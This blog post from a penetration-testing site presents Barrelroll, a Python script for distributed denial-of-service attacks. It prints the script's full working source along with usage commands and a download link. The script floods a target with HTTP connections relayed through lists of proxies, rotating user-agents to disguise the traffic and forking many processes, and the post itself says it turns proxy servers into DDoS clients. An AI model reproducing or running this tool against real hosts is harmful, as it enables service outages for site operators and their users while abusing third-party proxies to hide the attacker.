Barrelroll: A Simple Pycurl DDoS Tool!

by Mayuresh on February 15, 2012

in Open Source, Penetration Testing

BarrelrollBarrelroll is as simple as it gets. It is a simple Python script that leverages pycurl to initiate multiple connections to a host via multiple proxies. You can expect most security devices to block this kind of an attack.

Barrelroll tries to randomly change it’s user-agents and proxies to implement connection obfuscation. If you are interested in other attacks, check out Slowhttptest, OWASP HTTP Post Tool, and PyLoris among others. All Barrelroll needs is Python 2.3, pycurl and a huge list of proxy servers. There are a lot many proxy servers available with the source. This can effectively make proxy servers into DDoS clients.

Barrelroll source:

#!/usr/bin/python

import sys, os, signal, pycurl
from time import time
from random import choice

useragents = [
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
]

handles = []
SELECT_TIMEOUT = 5

pycurl.global_init(pycurl.GLOBAL_DEFAULT)

for line in sys.stdin:
    handle = pycurl.Curl()
    handle.setopt(pycurl.URL, sys.argv[1])
    handle.setopt(pycurl.PROXY, line.strip())
    handle.setopt(pycurl.FOLLOWLOCATION, 1)
    handle.setopt(pycurl.TIMEOUT, 5)
    handle.setopt(pycurl.MAXCONNECTS, 0)
    handle.setopt(pycurl.USERAGENT, choice(useragents))
    handle.setopt(pycurl.HTTPHEADER, [
        "Host: %s" % sys.argv[2],
        "Accept-Encoding: gzip, deflate"
    ])
    handles.append(handle)

for i in range(int(sys.argv[3]) - 1):
    if os.fork() == 0:
	break

while True:

    multi = pycurl.CurlMulti()

    for handle in handles:
        multi.add_handle(handle)

    init = time()

    num_handles = len(handles)
    while num_handles:

        if time() - init > SELECT_TIMEOUT: break

        ret = multi.select(SELECT_TIMEOUT)
        if ret == -1: continue
        while True:
            ret, num_handles = multi.perform()
            if ret != pycurl.E_CALL_MULTI_PERFORM: break

    for handle in handles:
        multi.remove_handle(handle)

    multi.close()

pycurl.global_cleanup()

Barrelroll usage:

$ ./barrelroll.py [ip] [host] [forks]

Example:

$ ./barrelroll.py 127.0.0.1 localhost 50 < proxies/list1.txt

Download Barrelroll:

Barrelrollbarrelroll.pyhttps://github.com/lfamorim/barrelroll

0

If you enjoyed this article, you might also like:

  • UPDATE: Slowhttptest 1.4!
    Our first post regarding Slowhttptest can be found here. A few hours ago, an updated - Slowhttptest ...
  • UPDATE: PyLoris 3.2!
    PyLoris time! A newer and updated version of the wonderful PyLoris is available for us to devour! Th...
  • UPDATE: OWASP HTTP Post Tool v3.6!
    Our first post regarding the OWASP HTTP Post Tool can be found here. Now, the author has released an...
  • UPDATE: OWASP HTTP Post Tool v3.5!
    Our first post regarding the OWASP HTTP Post Tool can be found here. Now, the author has released an...
  • The OWASP HTTP Post Tool!
    The OWASP HTTP Post Tool allows you to test your web applications to ensure its stability from HTTP ...
  • xdos.c: A Simple HTTP DoS Tool!
    A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an ...
  • UPDATE: PyLoris 3.0!
    We have been waiting a long time for Motoma to release this version! Finally, he has released PyLori...
  • Update: PyLoris 2.3
    In under a week, a newer version of PyLoris has been released by Motoma! This version has the follow...
  • Update: PyLoris 2.0!
    So, once again in less than 10 days, PyLoris is updated! Good news is - it now supports SOCKS, SSL, ...

Tagged as: , , , , , , ,

{ 0 comments… add one now }

Leave a Comment

* Copy this password:

* Type or paste password here:

Previous post:

Next post: